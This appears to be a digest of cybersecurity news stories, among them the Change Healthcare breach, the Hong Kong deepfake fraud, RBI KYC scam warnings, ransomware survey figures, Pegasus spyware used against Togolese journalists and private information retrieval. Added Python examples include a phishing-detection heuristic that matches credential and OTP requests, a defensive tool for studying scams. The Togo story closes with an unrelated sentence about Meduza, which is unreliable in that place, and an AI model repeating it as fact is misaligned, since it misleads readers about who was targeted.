First discovered on February 21, the security breach occurred at Change Healthcare, a division of Optum Inc., which is owned by UnitedHealth Group. 

In a report submitted to the U.S. Securities and Exchange Commission that same day, UnitedHealth Group informed government officials that it had been compelled to disconnect portions of Change Healthcare's extensive digital network from its clients. Not all of those services have been restored yet.

Change Healthcare stated that it is aiming to restore the provider payment systems by the middle of March in its most recent report regarding the attack. 

"UnitedHealth Group continues to make substantial progress in mitigating the impact to consumers and care providers of the unprecedented cyberattack on the U.S. health system and the Change Healthcare claims and payment infrastructure," the company noted in a statement.

The federal government intervened to provide assistance two weeks following the attack. The U.S. Department of Health and Human Services unveiled a number of support initiatives for impacted healthcare providers on March 5. 

"The government is trying to create some support for health care systems -- not directly supporting patients, but the systems," Dr. Céline Gounder, an editor-at-large for public health at KFF Health News and a CBS News medical contributor, stated. "This is because without revenue coming in through the billing process, you don't have money to make payroll to be able to pay your doctors and your nurses and your janitors and all the staff that you need to run a health care system.”

Unfortunately, this incident will probably not be the last. According to federal officials, big healthcare data breaches have nearly doubled between 2018 and 2022. 

Experts Issue Warning Regarding Rising Threat of AI-Driven Cyber-Physical Attacks

 

As artificial intelligence (AI) technologies advance, researchers are voicing concerns about the possibility of AI-fueled cyber-physical attacks on critical US infrastructure. Last month, the FBI warned that Chinese hackers might impair critical sectors such as water treatment, electrical, and transportation infrastructure. MIT's Stuart Madnick, an influential authority in cybersecurity, stresses that these concerns could transcend beyond digital damage and pose real threats to national security. 

Emerging threats to cybersecurity

The integration of AI into hacking strategies is changing the cybersecurity landscape, resulting in more complex and potentially destructive attacks. Madnick's research at MIT Sloan's CAMS has shown that cyberattacks can now cause physical harm, such as explosions in lab settings, by manipulating computer-controlled equipment. This differs from traditional cyberattacks, which typically impair services only temporarily, and highlights the rising threat of long-term damage to critical infrastructure. 

AI's role in rising threats 

Hackers now have more tools at their disposal to craft attacks that evade security measures due to the advancement of AI technologies. Tim Chase, CISO of Lacework, highlights how AI-driven manipulations could impact systems that use programmable logic controllers (PLCs). A major worry is that AI could make it possible for even intermediate hackers to physically harm industrial and healthcare systems, especially considering how dependent these industries are on antiquated systems that have little defence against such attacks. 

Call for robust security procedures

Enhanced cybersecurity solutions are desperately needed in light of these emerging risks. Using AI-powered security tools like anomaly detection and predictive maintenance is vital for mitigating physical and cyberattacks. The federal government's warnings to state election authorities also highlight the significance of staying vigilant and prepared to defend not just the physical infrastructure but also the integrity of democratic processes. 

As the possibility of AI-driven cyber-physical attacks rises, the need for better security measures becomes more pressing. Collaboration among government, industry and cybersecurity professionals is critical for developing and implementing solutions to the rising threats posed by AI-enhanced cyberattacks. The stakes are high: national infrastructure and the democratic fabric of society are at risk.

Hamilton City's Network is the Latest Casualty of the Global Cyberwar.

 

The attack that took down a large portion of the City of Hamilton's digital network is only the latest front in a global cybersecurity conflict, says one of Canada's leading cybersecurity experts. 

City officials have said little about the unprecedented attack on the municipality's network, which affected emergency services operations, the public library website and council members' phone lines. Although the specifics of Sunday's incident are still unknown, Charles Finlay, executive director of Rogers Cybersecure Catalyst, believes the attack is part of a larger campaign by shadowy criminal organisations determined to steal money and data. 

“I don't think that the average citizen of Hamilton or any other city, fully understands what's at play here,” Finlay stated. “Our security services certainly are, but I don't think the average citizen is aware of the fact that institutions in Canada, including Hamilton, are at the front lines of what amounts to a global cybersecurity conflict.” 

On Sunday, city hall revealed service delays caused by what it later described as a "cybersecurity incident" that had far-reaching consequences for the city's network and related services. 

The specifics of what took place, however, remain unknown as local officials maintain a cloak of secrecy. So far, the city has refused to divulge the extent of the damage or how affected departments are operating. Emergency services are described as "operational," with some activities now being completed "manually," but officials refuse to disclose specifics.

The city also refuses to reveal whether sensitive data was stolen or is being held ransom.

According to Vanessa Iafolla of Halifax-based Anti-Fraud Intelligence Consulting, a municipality may prefer to delay reporting the extent of the harm in order to preserve an impression of security and control. 

Finlay and Iafolla said they can only speculate about what transpired because city hall hasn't provided any information. However, given the available details and the consequences of other institutions' attacks, a ransomware attack is a realistic possibility. 

A ransomware attack is one in which malicious software is installed on a network, allowing the attackers to scan for and seize sensitive data. In the city's case, Iafolla said, that could mean personal information on employees and citizens, such as social insurance numbers and other identifying details.

“It's a safe bet that whatever they took is likely of real financial value,” concluded Iafolla. “It's difficult to speculate exactly what may have been taken, but I would be pretty confident in thinking whatever it is, is going to be a hot commodity.”

Here's Why a Robust Space Security Framework is the Need of the Hour


Satellite systems are critical for communication, weather monitoring, navigation, Internet access, and numerous other purposes. These systems, however, suffer multiple challenges that jeopardise their security and integrity. To tackle these challenges, we must establish a strong cybersecurity framework to safeguard satellite operations.

Cyber threats to satellites 

Satellite systems suffer a wide range of threats, including denial-of-service (DoS) attacks and malware infiltration, as well as unauthorised access and damage triggered by other objects in their orbit that hinder digital communications. 

For satellite systems, these threats can distort sensor systems, resulting in harmful actions based on inaccurate data. For example, a faulty sensor system could put a satellite on a collision course with another satellite or a natural space object. If a sensor system fails, it may in turn cause the failure of other space and terrestrial systems that rely on it. Jamming, or sending unauthorised guidance and control commands, has the potential to destroy other orbiting spacecraft.

DoS attacks can cause satellites to become unresponsive or, worse, shut down. Debris from a disabled satellite could pose a physical safety risk and damage other countries' space vehicles or fall to Earth. Malware installed via insufficiently secured access points may affect the satellite and spread to other systems with which it communicates. 

Many of the 45,000 satellites have been in service for years and have minimal (if any) built-in cybersecurity protection. Consider the Vanguard 1 (1958 Beta 2), a small, solar-powered satellite that orbits Earth. It was launched by the United States on March 17, 1958, and is the oldest satellite still orbiting the earth.

Given the potential risks that satellites face, a comprehensive cybersecurity strategy is required to mitigate them. Engineering universities and tech organisations must also work with government agencies and other entities that design and build satellites to develop and execute a comprehensive cybersecurity, privacy, and resilience framework to regulate industries that are expanding their use of space vehicles. 

Cybersecurity framework

The NIST Cybersecurity Framework (CSF) outlines five critical functions for mitigating common threats, including those related to satellite systems: identify, protect, detect, respond, and recover.

Identify

First, identify the satellite data, individuals, personnel, systems, and facilities that support the satellite's uses, goals, and objectives. Document the location of each satellite, as well as the links between each satellite component and other systems. Knowing which data is involved and how it is encrypted can help with contingency, continuity, and disaster recovery planning. Finally, understand your risk landscape and any elements that may affect the mission so that you can plan for and avoid potential incidents. This information will aid in the successful management of cybersecurity risk for satellite systems and their associated components, assets, data, and capabilities. 

Protect

Using the newly identified data, choose, develop, and implement the satellite's security ecosystem to best protect all of its components and associated services. Be aware that traditional space operations and vehicles typically rely on proprietary software and hardware that were not intended for a highly networked satellite, cyber, and data environment, so legacy components may lack certain security measures. Therefore, create, design, and use verification procedures to prevent loss of assurance or functionality in satellite systems' physical, logical, and ground segments, and to allow for response to and recovery from cybersecurity incidents. To protect satellite systems, physical and logical components must be secured, access controls monitored, and cybersecurity training made available.

Detect 

Create and implement relevant actions to monitor satellite systems, connections, and physical components for unforeseen incidents and alert users and applications when they are detected. Use monitoring to spot anomalies within space components, and put in place a strategy for dealing with them. Use multiple sensors and sources to correlate events, monitor satellite information systems, and maintain access to ground segment facilities in order to detect potential security breaches. 

Respond

Take appropriate actions to mitigate the impact of a cybersecurity attack or unusual incident on a satellite system, ground network, or digital ecosystem. Cybersecurity teams should inform key stakeholders regarding the incident and its implications. They should also put in place systems for responding to and mitigating new, known, and anticipated threats or vulnerabilities, as well as continuously improving these processes based on lessons learned. 

Recover 

Create and implement necessary activities to preserve cybersecurity and resilience, as well as to restore any capabilities or services that have been impaired as a result of a cybersecurity event. The objectives are to quickly restore satellite systems and associated components to normal functioning, return the organisation to its appropriate operational state, and prevent the same type of incident from recurring.

As our world continues to rely on satellite technology, cyber threats will emerge and adapt. It is critical to safeguard these systems by developing a comprehensive cybersecurity framework that outlines the way to design, create, and operate them. Such a structure enables organisations to respond effectively to incidents, recover swiftly from interruptions, and remain ahead of potential threats.

Identity Hijack: The Next Generation of Identity Theft


Synthetic representations of people's likenesses, or "deepfake" technology, are not new. Picture the 2019 episode of "The Mandalorian" in which Mark Hamill appeared as a de-aged, youthful Luke Skywalker. Similarly, artificial intelligence is not a novel concept. 

However, ChatGPT's launch at the end of 2022 made AI technology widely available at a low cost, which in turn sparked a competition to develop more potent models among almost all of the mega-cap tech companies (as well as a number of startups). 

For months, several experts have been speaking about the risks and active threats posed by the current expansion of AI, including rising socioeconomic imbalance, economic upheaval, algorithmic discrimination, misinformation, political instability, and a new era of fraud. 

Over the last year, there have been numerous reports of AI-generated deepfake fraud in a variety of formats, including attempts to extort money from innocent consumers, ridiculing artists, and embarrassing celebrities on a large scale. 

According to Australian Federal Police (AFP), scammers using AI-generated deepfake technology stole nearly $25 million from a multinational firm in Hong Kong last week.

A finance employee at the company moved $25 million into specific bank accounts after speaking with several senior managers, including the company's chief financial officer, via video conference call. Apart from the worker, no one on the call was genuine. 

Despite his initial suspicions, the people on the line appeared and sounded like coworkers he recognised.

"Scammers found publicly available video and audio of the impersonation targets on YouTube, then used deepfake technology to emulate their voices... to lure the victim into following their instructions," acting Senior Superintendent Baron Chan told reporters. 

Lou Steinberg, a deepfake AI expert and the founder of cyber research firm CTM Insights, believes that as AI grows stronger, the situation will worsen. 

"In 2024, AI will run for President, the Senate, the House and the Governor of several states. Not as a named candidate, but by pretending to be a real candidate," Steinberg stated. "We've gone from worrying about politicians lying to us to scammers lying about what politicians said... and backing up their lies with AI-generated fake 'proof.'" 

"It's 'identity hijacking,' the next generation of identity theft, in which your digital likeness is recreated and fraudulently misused," he added. 

The best defence against static deepfake images, he said, is to embed micro-fingerprint technology into camera apps, which would allow social media platforms to recognise when an image is genuine and when it has been tampered with. 

When it comes to interactive deepfakes (phone calls and videos), Steinberg believes the simple solution is to create a code word that can be employed between family members and friends. 

Companies, such as the Hong Kong corporation, should develop rules to handle nonstandard payment requests that require codewords or confirmations via a different channel, according to Steinberg. A video call cannot be trusted on its own; the officers involved should be called separately and immediately.
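The control Steinberg describes, a codeword plus confirmation over a separate channel before a nonstandard payment is released, can be written down as an approval gate. The following is an added illustration, not code from Steinberg, CTM Insights or the company involved; the beneficiary list, amount threshold, channel names and the sample request are constructed assumptions.

```python
import hmac
from dataclasses import dataclass

# Added illustration of the control described above: nonstandard payment
# requests are released only after a confirmation over a channel different
# from the one the instruction arrived on, carrying a pre-agreed codeword.
# Beneficiary list, threshold, channel names and the sample request below
# are constructed assumptions, not any company's real policy.

KNOWN_BENEFICIARIES = {"ACME-SUPPLIER-001", "PAYROLL-PROVIDER-UK"}
LARGE_AMOUNT = 50_000                      # assumed policy threshold
CONVERSATIONAL_CHANNELS = {"video_call", "phone_call", "chat", "email"}
# Confirmation channels the employee initiates from trusted data (e.g. a
# call-back to the number in the company directory, never one the caller gave).
TRUSTED_CONFIRMATION_CHANNELS = {"callback_directory_number", "in_person", "erp_dual_approval"}


@dataclass(frozen=True)
class PaymentRequest:
    requester: str
    amount: float
    beneficiary: str
    channel: str           # how the instruction reached the finance employee


@dataclass(frozen=True)
class Confirmation:
    channel: str           # how the employee verified it; must differ from the request channel
    codeword: str          # codeword supplied during that verification


def is_nonstandard(req: PaymentRequest) -> bool:
    """A request is nonstandard if it names a new beneficiary, exceeds the
    threshold, or was issued over a conversational channel, which is exactly
    where a deepfake can stand in for a colleague."""
    return (
        req.beneficiary not in KNOWN_BENEFICIARIES
        or req.amount >= LARGE_AMOUNT
        or req.channel in CONVERSATIONAL_CHANNELS
    )


def review_payment(req: PaymentRequest, confirmations: list[Confirmation],
                   expected_codeword: str) -> tuple[bool, str]:
    """Return (approved, reason). Standard requests fall through to the
    normal approval workflow; nonstandard ones need an out-of-band codeword."""
    if not is_nonstandard(req):
        return True, "standard request: normal approval workflow applies"
    for conf in confirmations:
        # A confirmation over the same channel, or over an untrusted one,
        # proves nothing: the impostor could be the one confirming.
        if conf.channel == req.channel or conf.channel not in TRUSTED_CONFIRMATION_CHANNELS:
            continue
        # constant-time comparison so the check itself does not leak the codeword
        if hmac.compare_digest(conf.codeword.encode(), expected_codeword.encode()):
            return True, f"nonstandard request confirmed out of band via {conf.channel}"
    return False, "nonstandard request lacks a valid out-of-band codeword confirmation; hold the payment"


if __name__ == "__main__":
    # Constructed scenario modelled on the incident above: a large transfer
    # to an unknown account, instructed on a video call.
    req = PaymentRequest("finance_clerk", 25_000_000, "NEW-ACCOUNT-HK-0042", "video_call")
    print(review_payment(req, [], "orchid"))
    print(review_payment(req, [Confirmation("video_call", "orchid")], "orchid"))
    print(review_payment(req, [Confirmation("callback_directory_number", "orchid")], "orchid"))
```

The design point is the channel check: a codeword repeated on the same video call is worthless, because the party asking for the payment is the one being verified. Only a confirmation the employee initiates through a trusted path counts.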

RBI Issues Warning Against Scam via KYC Trick


On February 2, 2024, the Reserve Bank of India (RBI) reiterated its prior warning to the public, offering further suggestions in response to a rising tide of scams involving Know Your Customer (KYC) updates. RBI amplified the cautionary tips it had issued to the public on September 13, 2021, citing continuing incidents and reports of consumers falling victim to scams perpetrated in the name of KYC updates. 

Modus operandi 

Customers typically receive unsolicited calls, texts, or emails requesting personal information, account or login credentials, or the installation of unapproved apps via links in the message. 

Frequently, the messages deliberately create a false sense of urgency by threatening to freeze or close the customer's account if they don't cooperate. When customers divulge critical private details or login credentials, they give fraudsters unauthorised access to their accounts and enable fraudulent transactions. 
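The pattern just described (a KYC pretext, manufactured urgency, a request for credentials or an OTP, a link or app to install) lends itself to a simple triage heuristic that a bank's fraud desk could run over messages customers report. The example below is added here and is not RBI guidance or any bank's real rule set; the signal list and the sample messages are constructed.

```python
import re

# Added triage heuristic for messages customers report to a bank's fraud desk,
# built from the pattern described above: a KYC pretext, manufactured urgency,
# a request for credentials, or a link/app install. The signals and the sample
# messages are constructed assumptions, not RBI guidance or any bank's rules.

SIGNALS = {
    "mentions KYC": [r"\bkyc\b"],
    "urgency or threat to the account": [
        r"\b(block\w*|suspen\w*|freez\w*|frozen|clos\w+|deactivat\w*)\b",
        r"\b(today|immediately|within \d+ hours?)\b",
    ],
    "asks for credentials or OTP": [r"\b(otp|pin|password|passcode|cvv|login|credentials?)\b"],
    "link or app install": [r"https?://", r"\bwww\.", r"\.apk\b", r"\binstall\b"],
}

# Constructed sample messages (not real SMS); the first three mimic the scam pattern,
# the fourth is a benign notification that must not be flagged.
SAMPLE_MESSAGES = [
    "Dear customer, your account will be BLOCKED today. Update KYC now: http://kyc-update-verify.example/login",
    "Your KYC is pending. Call 98xxxx and share OTP to avoid suspension.",
    "Install this app to complete KYC: http://app-download.example/kyc.apk",
    "Your monthly statement is ready. View it by logging in to the official app.",
]


def analyse_message(text: str) -> tuple[bool, list[str]]:
    """Return (flagged, matched signal names). A message is flagged when it uses
    the KYC pretext together with at least one pressure or collection signal;
    the KYC word alone (e.g. a genuine branch reminder) is not enough."""
    lowered = text.lower()
    hits = [name for name, patterns in SIGNALS.items()
            if any(re.search(p, lowered) for p in patterns)]
    flagged = "mentions KYC" in hits and len(hits) >= 2
    return flagged, hits


def triage(messages: list[str]) -> list[tuple[str, bool, list[str]]]:
    """Run the heuristic over a batch and keep the reasons for each verdict."""
    return [(m, *analyse_message(m)) for m in messages]


if __name__ == "__main__":
    for message, flagged, hits in triage(SAMPLE_MESSAGES):
        print("FLAG " if flagged else "ok   ", hits, message[:60])
```

Keeping the matched signal names alongside the verdict matters more than the verdict itself: it lets an analyst see why a message was flagged and tune the patterns when genuine bank notifications start tripping them.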

Quick reporting 

The Reserve Bank of India (RBI) advised victims of financial cyber fraud to report the incident right away on the National Cyber Crime Reporting Portal (www.cybercrime.gov.in) or by calling the cybercrime helpline 1930. 

Preventive measures 

To prevent people from becoming victims of KYC fraud, the RBI published a list of dos and don'ts. Critical data such as card details, PINs, passwords, OTPs, and account login credentials should never be shared with third parties, the RBI cautions the public. 

Individuals are also advised not to click on dubious or unverified links they receive via email or mobile devices, nor share KYC documents with unrecognised or unknown parties. "Do not share any sensitive information through unverified/unauthorised websites or applications," the central bank advised.

When you receive a request for a KYC update, contact your bank or financial institution directly for confirmation and help. Obtain customer service numbers and contact details only from the official website or other official sources. Report any incident of cyber fraud to the bank right away, and ask the bank about the approved ways to update your KYC information.

City Cyber Taskforce Introduced to Safeguard Corporate Finance in UK


Two of the UK's main accounting and security agencies are forming a new taskforce today to help organisations enhance the security of their corporate finance transactions. 

The effort is being led by the Institute of Chartered Accountants in England and Wales (ICAEW) in partnership with the National Cyber Security Centre. Other representatives from banking, law, consulting, and other fields include the Association of Corporate Treasurers, the British Private Equity and Venture Capital Association, Deloitte, EY, KPMG, the Law Society, the London Stock Exchange, the Takeover Panel, and UK Finance.

At the task force's launch earlier this week, the 14 organisations published new guidance meant to help businesses mitigate cyber-risk while engaging in corporate finance activities such as capital raising, mergers and acquisitions, and initial public offerings. 

Important guidelines regarding building resilience against cyberattacks, protecting commercially sensitive data shared during deal processes, and responding to breaches were all included in Cyber Security in Corporate Finance. Additionally, it will include important details about various cyber-risks. 

According to Michael Izza, CEO of ICAEW, organisations may be vulnerable to security breaches when confidential information is shared during a transaction. 

“A cyber-attack could have a potentially disastrous impact on the dealmaking process, and so it is crucial that boardrooms across the country treat threats very seriously and take preventative action,” Izza added. “We must do all that we can to ensure London remains a pre-eminent place to do deals, raise investment and generate growth.” 

Sarah Lyons, NCSC deputy director for economy and society, stated that chartered accountants are becoming an increasingly appealing target for threat actors due to the sensitive financial and risk data they handle. 

“A breach in this sector can not only jeopardise organisations and their customers, but can also undermine trust, confidence and reputation. I'd encourage everyone from across the industry to engage with this report and the NCSC's range of practical guidance, to help increase their cyber resilience,” Lyons advised.

Cohesity Research Shows That Most Firms Break Their "Do Not Pay" Policies by Paying Millions in Ransoms


While a "do not pay" ransomware policy may sound appealing in theory, thwarting attackers' demand for ransom in exchange for stolen data is easier said than done. A recent study conducted by Cohesity, a leader in AI-powered data security management, reveals this truth.

The study surveyed over 900 IT and security decision makers who take a "not if, but when" approach to cyberattacks on their business. According to the study, 94% of participants stated that their organisation would pay a ransom to retrieve data and resume commercial operations, with a further 5% responding, "Maybe, depending on the ransom amount." 

The majority of those surveyed had paid a ransom in the previous two years, and the vast majority predicted that the threat of cyberattacks will increase dramatically in 2024. Worryingly, 79% of respondents reported that their firm had been the victim of a ransomware attack between June and December 2023. Accordingly, 96% of respondents believe the threat of cyberattacks to their industry will increase this year, with 71% expecting it to increase by more than 50%. 

9 out of 10 companies paid ransom 

Sixty-seven percent of respondents stated their organisation would be prepared to pay more than $3 million to retrieve data and restore business processes, while 35% were willing to pay $5 million in ransom. The study also demonstrated the need to be able to respond and recover: 9 in 10 respondents indicated their organisation had paid a ransom in the previous two years, despite 84% claiming their company had a "do not pay" policy.

"Organisations can't control the increasing volume, frequency, or sophistication of cyberattacks such as ransomware," explained Brian Spanswick, Cohesity's chief information security officer and head of IT. "What they can control is their cyber resilience, which is the ability to respond quickly and recover." 

Expanding ransomware tactics

Since every ransomware incident is unique, the decision on whether or not to pay a ransom is best made with law enforcement or the company's cyber insurance provider. Meanwhile, each ransomware attack appears to be growing more sophisticated and intense as the attack surface keeps expanding. 

Delinea, a privileged access management (PAM) company, stated in its annual State of Ransomware report that the growing quantity and frequency of ransomware assaults indicate a shift in attackers' strategy. 

According to Delinea, new tactics that use "stealth" to exfiltrate sensitive and private data have supplanted the tried and tested approach of crippling a business and holding it hostage. To this end, attackers usually threaten either to exploit the data to secure an attractive cyber insurance payout or to sell it to the highest bidder on the darknet. 

Remember that internal as well as external sources can pose a threat to an organisation's cybersecurity: 90% of respondents stated that insider threats are as difficult as, or more difficult than, external attacks to identify and prevent, as the Securonix 2024 Insider Threat Report attests.

Pegasus Spyware Targets Two Journalists in Togo: RSF


Reporters Without Borders (RSF) disclosed that two journalists in Togo had spyware on their phones that resembled the potent Pegasus surveillance tool sold by the NSO Group. RSF reports that the journalists are accused of defaming a government minister and are currently on trial for it. Since 1963 the West African nation has been ruled by the same repressive royal family. 

RSF was unclear about the detected spyware, stating only that the "traces are typical of Pegasus." According to RSF, the Togo government employed Pegasus until at least 2021, and one of the two targeted journalists was exposed to a "major cyber-espionage operation throughout the first half of 2021.” 

RSF reported that Loïc Lawson, publisher of Flambeau des Démocrates, had 23 spyware attacks on his phone from February to July 2021. A second journalist, freelancer Anani Sossou, was targeted many months later, in October 2021. 

RSF stated that its forensic service for journalists, Digital Security Lab, conducted months of investigation, and Amnesty International's Security Lab corroborated its findings in an independent analysis. 

The organisation began probing the alleged phone tampering in December, roughly three weeks after the journalists were detained. Their arrest followed a complaint from Togo's minister of urban planning, housing, and land reform, who objected to their reporting disclosing the theft of approximately 600,000 Euros (nearly $650,000) in cash from his home.

According to RSF, the journalists were accused of undermining the minister's image and "inciting revolt" at a trial that began last month. While investigating the arrests, RSF stated in a press statement that it "discovered that [the journalists] had in fact been in the crosshairs of the Togolese authorities for a long time." 

The findings mark the first verified incident of spyware being used against journalists in Togo. Pegasus spyware has frequently targeted journalists, human rights campaigners, and opposition party leaders around the world in recent years. Researchers say the attack took place in February, shortly after the Russian government banned Timchenko's journal, Meduza, for being critical of Russia's invasion of Ukraine.

Cryptographers' Groundbreaking Discovery Enables Private Internet Searches


The desire for private internet searches has long been a cryptographic challenge. Historically, getting information from a public database without disclosing what was accessed (known as private information retrieval) has been a difficult task, particularly for large databases. The perfection of a private Google search, in which users can browse through material anonymously, has remained elusive due to the computational demands of such operations. 

However, a new study by three pioneering researchers has made tremendous progress in this field. They developed an innovative version of private information retrieval and expanded it to create a larger privacy method. This technique has been recognised for its pioneering potential, with plaudits expected at the annual Symposium on Theory of Computing in June 2023. 

Breaking barriers in cryptography

This development is based on a new way of discreetly pulling information from huge datasets. It addresses the significant challenge of doing private searches across large databases without a corresponding increase in computational effort. The technique is game-changing because it streamlines the process of conducting private searches, making them more viable and efficient. 

The strategy involves preprocessing the database by encoding the entire dataset into a special structure, so that queries can be answered by reading only a small part of it. This novel approach means that a single server can host the information and do the preprocessing once, enabling future users to retrieve data privately without incurring additional computing costs.

The future of online privacy 

While this breakthrough is noteworthy, practical applications are still being developed. The preprocessing method, as it stands, is most beneficial for extremely large databases and may not be realistic for everyday use given current processing performance and storage restrictions. 

Nonetheless, the research community remains optimistic. The history of cryptography reveals a similar pattern of optimising initially difficult outcomes into feasible ones. If the trend continues, private lookups from huge databases could become a reality, drastically changing our connection with the internet and significantly improving user privacy. 

A theoretical breakthrough

The new technique, invented by three cryptographers, employs a sophisticated kind of private information retrieval. It tackles the difficulty of executing private searches across large data sets without requiring additional computational resources. This is a major departure from standard approaches, which frequently require scanning the whole database to ensure secrecy. 
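To make the private information retrieval problem in the opening paragraph concrete, and to show the "scan the whole database" cost that the preprocessing approach above is designed to avoid, here is the classic two-server scheme of Chor, Goldreich, Kushilevitz and Sudan as an added example. It is not the three researchers' single-server construction, which the article does not describe in enough detail to reproduce; the database is constructed sample data, and the scheme assumes two non-colluding servers holding identical copies.

```python
import secrets

# Added baseline illustration of private information retrieval: the classic
# two-server scheme (Chor, Goldreich, Kushilevitz and Sudan). Two servers hold
# identical copies of the database and are assumed not to collude; each sees
# only a uniformly random subset of record indices, so neither learns which
# record was requested. This is NOT the single-server preprocessing
# construction discussed in the article; the database is constructed sample data.

RECORD_LEN = 16
DATABASE = [f"record-{i:02d}".ljust(RECORD_LEN).encode() for i in range(8)]


def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def client_queries(index: int, n: int) -> tuple[list[int], list[int]]:
    """Build the two masks. q1 is a uniformly random subset of [0, n);
    q2 is the same subset with the wanted index toggled. Seen in isolation,
    q2 is also uniformly random, so each server on its own learns nothing."""
    q1 = [secrets.randbits(1) for _ in range(n)]
    q2 = q1.copy()
    q2[index] ^= 1
    return q1, q2


def server_answer(db: list[bytes], mask: list[int]) -> bytes:
    """XOR together every record the mask selects. The server touches every
    record on every query (linear work), which is the cost the preprocessing
    approach in the article is designed to remove."""
    acc = bytes(RECORD_LEN)
    for record, selected in zip(db, mask):
        if selected:
            acc = xor_bytes(acc, record)
    return acc


def pir_retrieve(server_a_db: list[bytes], server_b_db: list[bytes], index: int) -> bytes:
    """Client side: records selected by both masks cancel under XOR,
    leaving exactly the record at `index`."""
    q1, q2 = client_queries(index, len(server_a_db))
    return xor_bytes(server_answer(server_a_db, q1), server_answer(server_b_db, q2))


def retrieves_every_record() -> bool:
    """Self-check: every index comes back intact regardless of the random masks."""
    return all(pir_retrieve(DATABASE, DATABASE, i) == DATABASE[i] for i in range(len(DATABASE)))


if __name__ == "__main__":
    print(pir_retrieve(DATABASE, DATABASE, 5))   # the record at index 5, padded to 16 bytes
    print(retrieves_every_record())
```

Privacy here rests entirely on the two servers not comparing notes: if they did, XORing the two masks would reveal the index immediately. Removing that assumption while keeping per-query work sublinear is what makes the single-server, preprocessing-based result described in this article significant.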

In a nutshell, these recent developments in cryptography are an important step towards enabling truly private internet searches. This advancement has the potential to revolutionise how we access and interact with information online, putting user privacy and security first in an increasingly digital environment.